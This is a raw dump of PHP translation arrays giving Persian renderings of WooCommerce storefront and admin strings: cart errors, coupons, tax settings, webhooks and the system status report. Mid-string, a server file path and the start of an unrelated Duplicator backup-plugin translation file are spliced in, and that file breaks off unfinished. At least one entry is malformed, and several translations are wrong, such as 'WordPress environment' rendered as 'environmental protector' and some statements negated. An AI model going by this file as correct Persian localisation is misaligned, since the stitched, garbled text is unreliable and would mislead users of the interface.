سفارش‌ها','%s is a required field.'=>'%s یک فیلد الزامی است.','You cannot add that amount of "%1$s" to the cart because there is not enough stock (%2$s remaining).'=>'شما نمی توانید این تعداد از "%1$s" را به سبد خرید خود اضافه کنید. موجودی انبار به این میزان نیست (%2$s باقی مانده است ).','You cannot add that amount to the cart — we have %1$s in stock and you already have %2$s in your cart.'=>'شما نمی توانید این مقدار را به سبد خرید خود بیافزایید — ما مجموعا %1$s موجودی در انبار داریم و قبلا %2$s در سبد خرید شما موجود می باشد.','The cart has been filled with the items from your previous order.'=>'سبد خرید با موارد سفارش قبلی شما پر شده است.','Cart updated.'=>'سبد خرید به روز شد.','Create orders'=>'ساخت سفارش‌ها','Create webhooks'=>'ساخت وب هوک‌ها','Parent orders'=>'سفارش‌های والد','Order cancelled by customer.'=>'سفارش توسط مشتری لغو شد.','Invalid payment method.'=>'روش پرداخت معتبر نمی باشد.','Please fill out all password fields.'=>'خواهشمندیم تمامی فیلد‌های گذرواژه را تکمیل کنید.','Please re-enter your password.'=>'خواهشمندیم گذرواژه خود را دوباره وارد کنید.','You must be logged in to download files.'=>'برای دانلود فایل‌ها باید وارد سایت شوید.','Admin menu nameTags'=>'برچسب‌ها','This email address is already registered.'=>'این آدرس ایمیل قبلا در سایت ثبت شده است.','This is not your download link.'=>'این لینک دانلود متعلق به شما نیست.','Passwords do not match.'=>'گذرواژه‌ها با یکدیگر تطبیق ندارند.','New passwords do not match.'=>'گذرواژه‌ها با یکدیگر هم خوانی ندارند.','Your current password is incorrect.'=>'گذرواژه فعلی شما نادرست است.','An error occurred in the request and at the time were unable to send the consumer data'=>'یک خطا در هنگام درخواست رخ داده است و در آن زمان قادر به ارسال داده‌های مشتری نبود','Username is required.'=>'نام کاربری مورد نیاز است.','Posts tagged “%s”'=>'نوشته‌های برچسب شده “%s”','View orders and sales reports'=>'نمایش سفارش‌ها و گزارش فروش‌ها','Account details changed successfully.'=>'مشخصات حساب کاربری با موفقیت تغییر یافت.','Products tagged “%s”'=>'محصولات برچسب خورده “%s”','Permissions is missing.'=>'مجوز‌ها گم شده اند.','Please rate the product.'=>'لطفا به این محصول امتیاز دهید.','Please enter your password.'=>'لطفا گذرواژه خود را وارد کنید.','Please enter a coupon code.'=>'لطفا یک کد تخفیف وارد کنید.','Invalid download link.'=>'لینک دانلود نادرست است.','%1$s units of %2$s have been backordered in order #%3$s.'=>'%1$s واحد از %2$s در سفارش #%3$s پیش خرید شده است.','%1$s is not valid. Please enter one of the following: %2$s'=>'%1$s معتبر نیست. لطفا یکی از موارد زیر را وارد کنید: %2$s','Parent coupon'=>'کدتخفیف والد','No coupons found in trash'=>'کدتخفیفی در زباله‌دان پیدا نشد','No coupons found'=>'کدتخفیفی یافت نشد','Search coupons'=>'جستجوی کدهای تخفیف','New coupon'=>'کدتخفیف جدید','Edit coupon'=>'ویرایش کدتخفیف','Add new coupon'=>'افزودن کدتخفیف جدید','Add coupon'=>'افزودن کدتخفیف','View and manage coupons'=>'نمایش و مدیریت کدهای تخفیف','View coupons'=>'نمایش کدهای تخفیف','Create coupons'=>'ساخت کدهای تخفیف','Coupon has been removed.'=>'کدتخفیف حذف شد.','Sorry there was a problem removing this coupon.'=>'ببخشید، ایرادی در پاک کردن کدتخفیف وجود دارد.','Valle'=>'Valle','Sorry, "%s" is not in stock. Please edit your cart and try again. We apologize for any inconvenience caused.'=>'متاسفانه موجودی انبار کمتر از %s است. خواهشمندیم سبد خرید خود را ویرایش کنید. عذرخواهی ما را بابت این مشکل پذیرا باشید.','the'=>'این','%s has been removed from your cart because it can no longer be purchased. Please contact us if you need assistance.'=>'%s به دلیل اینکه دیگر قادر به خریداری آن نیستید، از سبد خرید شما حذف شده است. اگر نیاز به کمکی دارید با ما در تماس باشید.','New shipping class Name'=>'نام کلاس حمل و نقل جدید','Add new shipping class'=>'افزودن کلاس حمل و نقل جدید','Update shipping class'=>'بروزرسانی کلاس حمل و نقل','Search shipping classes'=>'جستجوی کلاس‌های حمل و نقل','Invalid shipping method!'=>'روش حمل و نقل نامعتبر!','Postcode / ZIP'=>'کدپستی (بدون فاصله و با اعداد انگلیسی)','Please enter a valid postcode / ZIP.'=>'خواهشمند است یک کدپستی معتبر وارد نمایید.','%s is not a valid phone number.'=>'%s یک شماره تلفن معتبر نمی باشد، لطفا شماره تلفن را با اعداد انگلیسی وارد نمایید.','%s is not a valid email address.'=>'%s یک آدرس ایمیل معتبر نیست. لطفا یک آدرس ایمیل با حروف و اعداد انگلیسی وارد نمایید.','Premium support'=>'پشتیبانی ویژه','Prefecture'=>'اداره','(ex. tax)'=>'(بدون مالیات)','Access denied'=>'امکان دسترسی وجود ندارد','You do not have permission to access this page'=>'شما مجوز دسترسی به این برگه را ندارید','State / County'=>'استان','No file defined'=>'فایلی تعریف نشده است','%s is out of stock.'=>'%s در انبار موجود نیست.','Please enter your current password.'=>'خواهشمندیم گذرواژه فعلی خود را وارد کنید.','Please select a rating'=>'لطفا یک امتیاز را انتخاب کنید','Update %s'=>'به روز رسانی %s','Set product image'=>'گزینش نگاره محصول','Remove product image'=>'پاک کردن نگاره','Admin menu nameCoupons'=>'کدهای تخفیف','The %s is not a valid URL'=>'%s یک لینک معتبر نیست','Account username'=>'نام کاربری','We were unable to process your order, please try again.'=>'ما نمی توانیم سفارش را بررسی کنیم، خواهشمند دوباره تلاش کنید.','(ex. VAT)'=>'(بدون مالیات بر ارزش افزوده)','Your order can no longer be cancelled. Please contact us if you need assistance.'=>'سفارش شما دیگر قابل لغو نیست. در صورت نیاز به کمک، با ما تماس بگیرید.','Coupon code removed successfully.'=>'کد تخفیف با موفقیت حذف شد.','Coupon code applied successfully.'=>'کد تخفیف با موفقیت اعمال شد.','Coupon is not valid.'=>'کد تخفیف معتبر نیست.','File not found'=>'فایل پیدا نشد','Sorry, this download has expired'=>'متاسفانه این دانلود منقضی شده است','No webhooks found.'=>'وب هوکی پیدا نشد.','This is where you can add new coupons that customers can use in your store.'=>'محل افزودن کدهای تخفیف خرید مشتری.','View coupon'=>'نمایش کدتخفیف','This is where store orders are stored.'=>'محل ذخیره سفارشات.','No orders found in trash'=>'سفارشی در زباله‌دان یافت نشد','Parent shipping class'=>'کلاس حمل و نقل والد','All shipping classes'=>'همه کلاس‌های حمل و نقل','Please choose product options…'=>'لطفا گزينه‌های محصول را انتخاب کنيد;','You can only have 1 %s in your cart.'=>'شما تنها می‌توانید یک %s در سبد خرید خود داشته باشید.','Customer details'=>'مشخصات خریدار','Log in to Download Files'=>'برای دانلود فایل‌ها باید وارد سایت شوید','Sorry, you have reached your download limit for this file'=>'متاسفانه دسترسی شما برای دانلود این فایل محدود شده است','Invalid order.'=>'سفارش نامعتبر.','Sorry, coupon "%s" has already been applied and cannot be used in conjunction with other coupons.'=>'متاسفانه ! کد تخفیف "%s" قبلا اعمال شده و نمی‌توان همراه با کدهای تخفیف دیگر استفاده کرد.','Sorry, it seems the coupon "%s" is invalid - it has now been removed from your order.'=>'متاسفانه ! به نظر می‌رسد کد تخفیف "%s" معتبر نیست - کد تخفیف از سفارش شما حذف شد.','Sorry, your session has expired. Return to shop'=>'متاسفانه وقت شما به اتمام رسید، بازگشت به فروشگاه','Notes about your order, e.g. special notes for delivery.'=>'یادداشت‌ها درباره سفارش شما، برای مثال نکات مهم درباره نحوه تحویل سفارش.','Sorry, this product cannot be purchased.'=>'متاسفانه ! این محصول قابل خریداری نیست.','The callback_url needs to be over SSL'=>'این callback_url نیاز به بیش از SSL دارد','Refund failed.'=>'استرداد انجام نشد.','Sorry, your session has expired.'=>'متاسفانه زمان شما به اتمام رسید.','Page slugmy-account'=>'my-account','Page slugcheckout'=>'checkout','Page slugcart'=>'cart','Page slugshop'=>'shop','Sorry, this product is unavailable. Please choose a different combination.'=>'با عرض پوزش، این کالا در دسترس نیست. لطفا ترکیب دیگری را انتخاب کنید.','Sorry, no products matched your selection. Please choose a different combination.'=>'با عرض پوزش، هیچ کالايی مطابق انتخاب شما یافت نشد. لطفا ترکیب دیگری را انتخاب کنید.','Please choose a product to add to your cart…'=>'لطفا یک محصول برای اضافه کردن به سبد خرید انتخاب کنید;','Please choose the quantity of items you wish to add to your cart…'=>'لطفا تعداد مواردی را که می‌خواهید به سبد خرید خود اضافه کنید انتخاب کنید;','Get cart should not be called before the wp_loaded action.'=>'تابع Get cart نباید قبل از اکشن wp_loaded فراخوانی شود.','%d product'=>'%d محصولات','%s is a required field'=>'%s یک فیلد الزامی است','Cancelled (%s)'=>'لغو شده (%s)','Completed (%s)'=>'تکمیل شده (%s)','On hold (%s)'=>'در انتظار بررسی (%s)','Pending payment (%s)'=>'در انتظار پرداخت (%s)','Processing (%s)'=>'در حال انجام (%s)','Refunded (%s)'=>'مسترد شده (%s)','Coupon code "%s" already applied!'=>'کد تخفیف "%s" قبلاً اعمال شده است!','Sorry, coupon "%s" is not valid for sale items.'=>'متاسفانه، کوپن "%s" برای اقلام حراج معتبر نیست.','Sorry, coupon "%s" is not applicable to your cart contents.'=>'متاسفانه، کوپن "%s" برای محتویات سبد خرید شما قابل استفاده نیست.','Coupon'=>'کوپن','Coupon does not exist.'=>'کوپن وجود ندارد.','Unfortunately, we do not ship %1$s %2$s. Please enter an alternative shipping address.'=>'متاسفانه، ما %1$s %2$s ارسال نمی‌کنیم. لطفا یک آدرس حمل و نقل جایگزین وارد کنید.','The root URL of your site.'=>'آدرس Root سایت شما.','The version of WooCommerce installed on your site.'=>'نگارش ووکامرس بر روی سایت شما نصب شده است.','The version of WordPress installed on your site.'=>'نگارش وردپرس نصب شده بر روی سایت شما.','Whether or not you have WordPress Multisite enabled.'=>'یا شما وردپرس شبکه را فعال نکرده اید.','The maximum amount of memory (RAM) that your site can use at one time.'=>'بیشینه مقدار حافظه ای (RAM) که سایت شما می تواند در یک زمان بکار گیرد.','Displays whether or not WordPress is in Debug Mode.'=>'نمایش ایرادها یا اینکه وردپرس در حالت اشکال زدایی است.','Language'=>'زبان','The current language used by WordPress. Default = English'=>'زبان کنونی وردپرس. پیش پندار= انگلیسی','Information about the web server that is currently hosting your site.'=>'اطلاعاتی درباره وب سروری که میزبان سایت شما می باشد.','The version of PHP installed on your hosting server.'=>'نگارش PHP نصب شده بر روی سرور میزبان شما.','The largest filesize that can be contained in one post.'=>'بزرگترین اندازه فایلی که می تواند در یک نوشته گذاشته شود.','The maximum number of variables your server can use for a single function to avoid overloads.'=>'حداکثر تعداد متغیرهای سرور شما می تواند برای یک تابع تک برای جلوگیری از اضافه بار استفاده کند.','The largest filesize that can be uploaded to your WordPress installation.'=>'بزرگترین اندازه فایلی که می تواند در نصب وردپرس بارگذاری شود.','Default timezone is %s - it should be UTC'=>'منطقه زمانی پیشفرض %s می باشد - شما می بایست از UTC استفاده کنید','GZip (gzopen) is used to open the GEOIP database from MaxMind.'=>'GZip (gzopen) مورد استفاده پایگاه داده GEOIP از MaxMind می باشد.','PayPal uses this method of communicating when sending back transaction information.'=>'پی پال با استفاده از این روش برای برقراری ارتباط در هنگام ارسال اطلاعات بازگشت مربوط به تراکنش استفاده می کند.','Error: %s'=>'ایراد: %s','Database'=>'پایگاه داده','Table does not exist'=>'جدول وجود ندارد','Visit plugin homepage'=>'نمایش خانه افزونه','Network enabled'=>'شبکه فعال شد','Force SSL'=>'اجبار SSL','Does your site force a SSL Certificate for transactions?'=>'آیا سایت شما یک مجوز SSL اجباری برای تراکنشها داشته است؟','The position of the currency symbol.'=>'جایگاه نماد پول.','API Version'=>'نگارش API','Page not set'=>'برگه تنظیم نشده است','Theme'=>'پوسته','The name of the current active theme.'=>'نام پوسته فعال شده کنونی.','The installed version of the current active theme.'=>'نگارش نصب شده پوسته، هم اکنون فعال شد.','Author URL'=>'لینک نویسنده','The theme developers URL.'=>'آدرس برنامه نویسان پوسته.','Displays whether or not the current theme is a child theme.'=>'چه چیزی نمایش شود یا اینکه پوسته جاری یک پوسته فرزند نیست.','Displays whether or not the current active theme declares WooCommerce support.'=>'چه چیزی نمایش شود یا اینکه پوسته جاری ووکامرس را پشتیبانی نمی کند.','Templates'=>'قالب‌ها','Tools'=>'ابزار','Change to:'=>'تغییر به:','Enter price (%s)'=>'قیمت را بنویسید (%s)','Enter sale price (%s)'=>'قیمت فروش را بنویسید (%s)','L/W/H'=>'طول/عرض/ارتفاع','Length (%s)'=>'درازا (%s)','Width (%s)'=>'پهنا (%s)','Sale'=>'فروش ویژه','Height (%s)'=>'بلندا (%s)','Catalog & search'=>'دفترچه محصول & جستجو','In stock?'=>'در انبار؟','Backorders?'=>'پیش خرید؟','Run the Setup Wizard'=>'اجرای راه اندازی سریع','Custom:'=>'دلخواه:','Page settingCart'=>'سبد خرید','Invalid coupon code'=>'کد تخفیف نامعتبر است','Consumer secret is invalid.'=>'رمز مصرف کننده نامعتبر است.','Learn more about templates'=>'اطلاعات بیشتر درباره الگوها','Skip setup'=>'رد کردن راه اندازی','Sold individually?'=>'فروش به صورت جداگانه؟','Decrease existing price by (fixed amount or %):'=>'کاهش قیمت معمول با (مقدار ثابت یا %)','Not declared'=>'اعلام نشده','WooCommerce support'=>'پشتیبانی ووکامرس','Child theme'=>'پوسته فرزند','Page settingMy account'=>'حساب کاربری من','Remote get'=>'گرفتن از راه دور','Remote post'=>'نوشته از راه دور','Default timezone is UTC'=>'منطقه زمانی پیش پندار است','SUHOSIN installed'=>'SUHOSIN نصب شده است','PHP time limit'=>'محدودیت زمانی PHP','Server environment'=>'محیط سرور','Log directory writable'=>'پوشه Log قابل نوشتن است','WordPress environment'=>'وردپرس حافظ محیط زیست','Copy for support'=>'کپی برای پشتیبانی','Your server does not have the %s class enabled - HTML/Multipart emails, and also some extensions, will not work without DOMDocument.'=>'سرور شما %s را ندارد. کلاس فعال شده - ایمیل‌های HTML/چندبخشی، و همچنین بعضی از افزونه‌ها، بدون DOMDocument کار نخواهند کرد.','The thousand separator of displayed prices.'=>'سواکننده هزارگان قیمت‌ها نمایش داده شود.','Payment gateways can use cURL to communicate with remote servers to authorize payments, other plugins may also use it when communicating with remote services.'=>'درگاه‌های پرداخت می توانند از cURL برای اتصال با دیگر سرور‌ها برای تایید و پرداخت استفاده کنند، دیگر افزونه‌ها همچنین می توانند در هنگام اتصال به سرویس‌های خارجی از این قابلیت استفاده نمایند.','Some webservices like shipping use SOAP to get information from remote servers, for example, live shipping quotes from FedEx require SOAP to be installed.'=>'برخی وبسرویس‌ها مانند حمل و نقل و درگاه‌ها از SOAP برای ارسال و دریافت اطلاعات بین سرور‌ها استفاده می کنند، برای مثال، درگاه‌های بانکی ملت و حمل و نقل FedEx به SOAP برای نصب نیاز دارند.','If you are modifying WooCommerce on a parent theme that you did not build personally we recommend using a child theme. See: How to create a child theme'=>'اگر شما در حال ویرایش و شخصی سازی ووکامرس روی قالب والد هستید پیشنهاد می کنیم از قالب فرزند استفاده کنید. ببینید: چگونه یک قالب فرزند بسازیم','HTML/Multipart emails use DOMDocument to generate inline CSS in templates.'=>'ایمیل‌های HTML/چندگانه برای ساخت درون خطی CSS در الگوهااز اسناد DOM استفاده می کنند.','Several WooCommerce extensions can write logs which makes debugging problems easier. The directory must be writable for this to happen.'=>'افزونه‌های ووکامرس متعددی می توانند گزارش‌هایی را بنویسند که حل مشکلات را آسانتر کنند. برای این موضوع پوشه باید قابل نوشتن باشد.','WooCommerce plugins may use this method of communication when checking for plugin updates.'=>'افزونه‌های ووکامرس ممکن است از این روش ارتباطی در هنگام بررسی کردن برای بروز رسانی افزونه استفاده کند.','Logs'=>'گزارش‌ها','The version of MySQL installed on your hosting server.'=>'نگارش نصب شده MySQL بر روی سرور‌هاست شما.','What currency prices are listed at in the catalog and which currency gateways will take payments in.'=>'چه قیمت‌های ارزی در کاتالوگ لیست شده اند و کدام درگاههای ارزی، می توانند پرداختها را بگیرند.','The amount of time (in seconds) that your site will spend on a single operation before timing out (to avoid server lockups)'=>'مقدار زمانی (در ثانیه) که شما در سایت بر روی یک تک کار قبل از تمام شدن وقت خواهید گذراند، ( جهت جلوگیری از ممانعت‌های سرور)','A list of taxonomy terms that can be used in regard to order/product statuses.'=>'فهرستی از واژه‌های طبقه بندی است که می تواند در مورد وضعیت سفارش/محصول استفاده شود.','Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers on the one hand against a number of well known problems in PHP applications and on the other hand against potential unknown vulnerabilities within these applications or the PHP core itself. If enabled on your server, Suhosin may need to be configured to increase its data submission limits.'=>'Suhosin یک سیستم حفاظت پیشرفته برای نصب PHP است. این سیستم جهت محافظت از سرورهای شما در برابر تعدادی از مشکلات شناخته شده در برنامه‌های PHP در یک طرف و از سوی دیگر در برابر آسیب پذیری‌های ناشناخته بالقوه در این برنامه‌ها و یا هسته PHP خود طراحی شده است. اگر Suhosin را بر روی سرور خود فعال کنید، ممکن است جهت افزایش محدودیت داده‌ها به پیکربندی نیاز شود.','Welcome to WooCommerce – You‘re almost ready to start selling :)'=>' به ووکامرس خوش آمدید – شما‘ تقریبا آماده هستید تا فروش خود را آغاز کنید:)','File does not exist'=>'پرونده وجود ندارد','Page does not contain the %s shortcode.'=>'برگه حاوی کدکوتاه %s نیست.','Deleted %s'=>'%s حذف شد','MySQL version.'=>'نسخه MySQL.','Save changes'=>'ذخیره تغییرات','Overrides'=>'موارد نادیده گرفته شده','Page settingCheckout'=>'پرداخت','PHP max input vars'=>'حداکثر ورودی متغیرهای PHP','PHP post max size'=>'حداکثر اندازه پست PHP','Understanding the status report'=>'آشنایی با گزارش وضعیت','Version'=>'نگارش','The name of the parent theme.'=>'نام پوسته مادر.','The installed version of the parent theme.'=>'نگارش پوسته مادر نصب شده است.','The parent theme developers URL.'=>'آدرس برنامه نویسان پوسته مادر.','The coupon code already exists'=>'کد تخفیف از قبل وجود دارد','WC database version.'=>'نسخه‌ی پایگاه داده ووکامرس.','The decimal separator of displayed prices.'=>'جداکننده اعشاری قیمت‌های نمایش داده شده.','The number of decimal points shown in displayed prices.'=>'تعداد نقاط اعشاری در قیمت‌های نمایش داده شده.','Page settingShop base'=>'فروشگاه‌محور','Visibility'=>'قابلیت مشاهده','Placeholder'=>'مكان گيرنده','Missing parameter %s'=>'پارامتر %s گم شده است','WooCommerce API. Use a consumer key in the username field and a consumer secret in the password field.'=>'API ووکامرس. یک کلید مصرف کننده در فیلد نام کاربری و یک رمز مصرف کننده در فیلد پسورد بکار ببرید.','— No Change —'=>'— بدون تغییر—','Parent theme author URL.'=>'آدرس نویسنده قالب والد.','Parent theme version.'=>'نسخه والد قالب.','Parent theme name.'=>'نام قالب والد.','%s is available'=>'%s در دسترس است','Active plugins.'=>'افزونه‌های فعال.','Your server does not have fsockopen or cURL enabled - PayPal IPN and other scripts which communicate with other servers will not work. Contact your hosting provider.'=>'در سرور شما فعال نیست - IPN پی پال و باقی اسکریپت‌هایی که نیاز به ارتباط با سرور‌های دیگر دارند کار نخواهند کرد. با پشتیبانی‌هاستینگ خود تماس بگیرید.','Max upload size.'=>'حداکثر اندازه آپلود.','PHP version.'=>'ورژن PHP.','Server info.'=>'مشخصات سرور.','This section shows any files that are overriding the default WooCommerce template pages.'=>'در این بخش هر فایلی که فارغ از صفحات قالب پیشفرض ووکامرس می باشد را نشان می دهد.','The default timezone for your server.'=>'منطقه زمانی پیشفرض برای سرور شما.','Order note is required.'=>'یادداشت سفارش الزامی است.','If you define a "Terms" page the customer will be asked if they accept them when checking out.'=>'اگر شما برگه «شرایط» را فعال کنید، در زمان تسویه‌حساب از کاربر درخواست می‌شود که این برگه را خوانده و تایید کند.','Pay'=>'پرداخت','Emails'=>'ایمیل‌ها','Specific Countries'=>'کشورهای خاص','Shop base address'=>'آدرس اصلی فروشگاه','Geolocate'=>'مکان یابی','Geolocate (with page caching support)'=>'مکان یابی ( با پشتیبانی از کش برگه )','This is a demo store for testing purposes — no orders shall be fulfilled.'=>'این یک وبسایت دمو است و با هدف تست ساخته شده است، هیچ‌یک از محصولات موجود در سایت برای فروش نبوده و امکان خرید از این وبسایت وجود ندارد.','The following options affect how prices are displayed on the frontend.'=>'پیکربندی زیر، چگونگی نمایش قیمت در سایت را نشان می دهد.','Currency'=>'واحد پولی','This controls what currency prices are listed at in the catalog and which currency gateways will take payments in.'=>'این گزینه تعیین میکند که چه واحدهای پولی در کاتالوگ قابل انتخاب باشند و چه درگاه‌های پرداختی استفاده شوند.','This sets the thousand separator of displayed prices.'=>'نمایش دادن جداکننده هزارگان در قیمت محصولات.','Integration'=>'ادغام','The base page can also be used in your product permalinks.'=>'برگه پایه فروشگاه همچنین می تواند در پیوند محصولات مورد استفاده قرار گیرد.','This sets the base page of your shop - this is where your product archive will be.'=>'برگه اصلی فروشگاه شما - جایی که آرشیو محصولات شما خواهند بود.','Show products'=>'نمایش محصولات','Show subcategories'=>'نمایش زیردسته‌ها','Popularity (sales)'=>'محبوبیت (فروش)','Add to cart behaviour'=>'افزودن به روش سبد خرید','Redirect to the cart page after successful addition'=>'انتقال به برگه سبد خرید بعد از «افزودن به سبد»','Enable stock management'=>'فعال کردن مدیریت موجودی انبار','Enable low stock notifications'=>'فعال کردن آگهی کم بودن موجودی انبار','Enable out of stock notifications'=>'فعال کردن آگهی خالی شدن انبار','Hide out of stock items from the catalog'=>'مخفی کردن محصولاتی که در انبار موجود نیستند','X-Accel-Redirect/X-Sendfile'=>'X-Accel-Redirect/X-Sendfile','Redirect only'=>'فقط انتقال (ریدایرکت)','Downloads require login'=>'دانلودها نیازمند ورود هستند','Grant access to downloadable products after payment'=>'دسترسی به محصولات دانلودشدنی بعد از پرداخت','Measurements'=>'اندازه گیری','Ship to all countries you sell to'=>'حمل و نقل به تمامی کشورهایی که محصول را می فروشید','Select the access type of these keys.'=>'نوع دسترسی به این کلید را گزینش کنید.','Copied!'=>'کپی شد!','Copy'=>'کپی','QRCode'=>'بارکد QR','Cities for this rule. Semi-colon (;) separate multiple values. Leave blank to apply to all cities.'=>'شهرهای این قانون. با استفاده از (;) میتوانید شهر‌ها را از هم جدا کنید. خالی به معنای اعمال روی همه شهرهاست.','Enter a name for this tax rate.'=>'یک نام برای این مالیات انتخاب کنید.','Priority'=>'اولویت','Insert row'=>'افزودن ردیف','Import CSV'=>'درون‌ریزی CSV','No row(s) selected'=>'ردیفی انتخاب نشده است','Method'=>'روش','Content'=>'محتویات','The options are "Active" (delivers payload), "Paused" (does not deliver), or "Disabled" (does not deliver due delivery failures).'=>'پیکربندی "فعال" هستند (ارائه محموله)، "متوقف شده است& (ارسال نمی شود)، یا "غیرفعال" شده ( به دلیل خطاهای حمل و نقل، ارسال نمی شود).','Action'=>'عملیات','Custom'=>'سفارشی سازی','URL where the webhook payload is delivered.'=>'لینک وقتیکه محموله وب هوک تحویل داده شده است.','Secret'=>'محرمانه','Updated at'=>'بروزرسانی شده در','Customer billing address'=>'آدرس ارسال صورت‌حساب مشتری','Rounding'=>'گرد کردن','Including tax'=>'با احتساب مالیات','Excluding tax'=>'بدون احتساب مالیات','Marketing'=>'بازاریابی','Free'=>'رایگان','Get system report'=>'دریافت گزارش سیستم','Price display suffix'=>'پسوند قیمت نمایشی','Additional tax classes'=>'کلاس‌های مالیاتی اضافی','Calculate tax based on'=>'محاسبه مالیات بر اساس','Prices entered with tax'=>'قیمت‌های وارد شده با مالیات','Enable taxes'=>'فعال کردن مالیات','Save webhook'=>'ذخیره وب هوک','Enter the action that will trigger this webhook.'=>'عملی را وارد کنید که موجب این وب هوک شود.','Action event'=>'رویداد عملیات','Product deleted'=>'محصول پاک شد','Product updated'=>'محصول بروزرسانی شد','Webhook data'=>'داده وب هوک','Tax name'=>'نام مالیات','State code'=>'کد استان','Country code'=>'کد کشور','Consumer secret'=>'رمز مصرف کننده','Consumer key'=>'کلید مصرف کننده','Revoke key'=>'کلید ابطال','Key details'=>'جزییات کلید','Tax options'=>'پیکربندی مالیات','Dimensions unit'=>'یکای اندازه گیری ابعاد','Force downloads'=>'اجبار به دانلودها','File download method'=>'روش دانلود فایل','Stock display format'=>'نحوه نمایش موجودی انبار','Out of stock visibility'=>'نمایش تمام‌شدن موجودی انبار','Out of stock threshold'=>'آستانه تمام‌شدن موجودی انبار','Low stock threshold'=>'آستانه کم‌بودن موجودی انبار','Notification recipient(s)'=>'آگاه سازی گیرنده(ها)','Hold stock (minutes)'=>'نگهداری موجودی (دقیقه)','Manage stock'=>'مدیریت موجودی','Average rating'=>'میانگین رای (امتیاز)','Shop page display'=>'نمای برگه فروش','Shop page'=>'برگه فروشگاه','Currency options'=>'پیکربندی واحد پولی','Store notice'=>'اعلان فروشگاه','Email template'=>'الگوی ایمیل','Email sender options'=>'پیکربندی ارسال ایمیل','Email options'=>'پیکربندی ایمیل','Add payment method'=>'افزودن روش پرداخت','Order received'=>'سفارش دریافت شد','Checkout endpoints'=>'تکمیل پرداخت','Terms and conditions'=>'شرایط و ضوابط','Cart page'=>'برگه سبد خرید','Show "verified owner" label on customer reviews'=>'نمایش برچسب «مالک تاییدشده» برای دیدگاه‌های مشتری','IP address'=>'آدرس IP','This sets the number of decimal points shown in displayed prices.'=>'این گزینه تعداد جداکنندگان اعشاری که در قیمت نمایش داده می‌شود را تعیین می‌کند.','Sort by most recent'=>'نمایش به ترتیب جدیدترین‌ها','Display prices in the shop'=>'نمایش قیمت‌ها در فروشگاه','Select when the webhook will fire.'=>'گزینش زمان اجرای وب هوک.','Tax rate ID.'=>'شناسه نرخ مالیات.','No, I will enter prices exclusive of tax'=>'خیر، من قیمت را بدون مالیات وارد خواهم کرد','Ship to all countries'=>'حمل و نقل به تمام کشور‌ها','Ship to specific countries only'=>'حمل و نقل به کشور‌های خاص','Yes, I will enter prices inclusive of tax'=>'بله، من قیمت شامل مالیات را وارد می کنم','Notifications'=>'اطلاع رسانی‌ها','These pages need to be set so that WooCommerce knows where to send users to checkout.'=>'این برگه‌ها نیاز به انتخاب دارند تا ووکامرس بفهمد که هرکدام کجا هستند. این برگه‌ها در هنگام نصب افزونه ساخته می شوند، اگرنه باید آنها را دستی بسازید.','This option determines which address is used to calculate tax.'=>'این گزینه بررسی می کند که کدام آدرس برای محاسبه مالیات استفاده شود.','Remove selected row(s)'=>'پاک کردن ردیف‌های انتخاب شده','Shipping tax class based on cart items'=>'کلاس مالیاتی حمل و نقل بر اساس آیتم‌های سبد خرید','Standard rates'=>'نرخ‌های استاندارد','%s rates'=>'نرخ‌های %s','Display tax totals'=>'نمایش مجموع مالیات‌ها','Display prices during cart and checkout'=>'نمایش قیمت‌ها درون سبد خرید و برگه پرداخت','Sort by price (asc)'=>'مرتب‌سازی قیمت (صعودی)','Sort by price (desc)'=>'مرتب‌سازی قیمت (نزولی)','Access restriction'=>'محدودیت‌های دسترسی','Define text to show after your product prices. This could be, for example, "inc. Vat" to explain your pricing. You can also have prices substituted here using one of the following: {price_including_tax}, {price_excluding_tax}.'=>'متن نمایشی که پس از قیمت محصول نشان داده می شود، را بنویسید.به عنوان نمونه، "inc. Vat" می تواند جهت توضیح قیمت‌های شما باشد. شما همچنین می توانید یکی از قیمت‌های ثبت شده زیر را هم استفاده کنید: /home/filetir/public_html/wp-content/languages/plugins/duplicator-fa_IR.l10n.php:return ['x-generator'=>'GlotPress/4.0.3','translation-revision-date'=>'2026-01-28 18:01:12+0000','plural-forms'=>'nplurals=1; plural=0;','project-id-version'=>'Plugins - Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More - Stable (latest release)','language'=>'fa','messages'=>['This opens connect.duplicator.com where you\'ll securely connect to Duplicator Pro.'=>'این دستور connect.duplicator.com را باز می‌کند که در آن می‌توانید به طور ایمن به Duplicator Pro متصل شوید.','Already purchased? Connect to unlock Duplicator PRO!'=>'قبلاً خریداری کرده‌اید؟ برای باز کردن قفل داپلیکیتور حرفه‌ای! متصل شوید','Please try again or contact support if the issue persists.'=>'لطفا دوباره امتحان کنید یا در صورت بروز مشکل با پشتیبانی تماس بگیرید.','Failed to connect to Duplicator Pro.'=>'اتصال به Duplicator Pro ناموفق بود.','Upgrade installation failed: %s. Please try again or install manually.'=>'نصب ارتقا ناموفق بود: %s. لطفاً دوباره امتحان کنید یا دستی نصب کنید.','DB Reset Plugin'=>'افزونه تنظیم مجدد پایگاه داده','Backup files are stored in the wp-content directory for better security and compatibility.'=>'فایل‌های پشتیبان برای امنیت و سازگاری بهتر در پوشه wp-content ذخیره می‌شوند.','Storage Location'=>'محل نگهداری','Misc'=>'متفرقه','Made with ♥ by the Duplicator Team'=>'ساخته شده با ♥ توسط تیم داپلیکیتور','Free Plugins'=>'افزونه‌های رایگان','Migration Services'=>'خدمات مهاجرت','Docs'=>'اسناد','Clean & Reset WordPress Database'=>'پاک‌سازی و تنظیم مجدد پایگاه داده وردپرس','Save Misc Settings'=>'تنظیمات متفرقه را ذخیره کنید','Misc Settings Saved'=>'تنظیمات متفرقه ذخیره شد','Connect to Duplicator Pro'=>'اتصال به Duplicator Pro','To unlock more features consider 'بازنشانی پایگاه داده حرفه ای','Upgrade Now!'=>'هم‌اکنون ارتقاء دهید!','1: name of pro plan, 2: name of elite planBy upgrading to the Elite or Pro plans you will unlock the ability to create backups and do advanced migrations on multi-site installations!'=>'با ارتقا به پلن‌های Elite یا حرفه‌ای، قابلیت ایجاد پشتیبان و انجام مهاجرت‌های پیشرفته در نصب‌های چندسایته را خواهید داشت!','Duplicator Lite does not officially support WordPress multisite functionality'=>'داپلیکیتور Lite رسماً از قابلیت‌های وردپرس پشتیبانی نمی‌کند','Upgrade failed. Please check if you have the necessary permissions to activate plugins.'=>'ارتقا ناموفق بود. لطفاً بررسی کنید که آیا مجوزهای لازم برای فعال کردن افزونه‌ها را دارید یا خیر.','Learn more about this change and how to upgrade'=>'درباره این تغییر و نحوه ارتقا بیشتر بدانید','Please contact your hosting provider to upgrade your 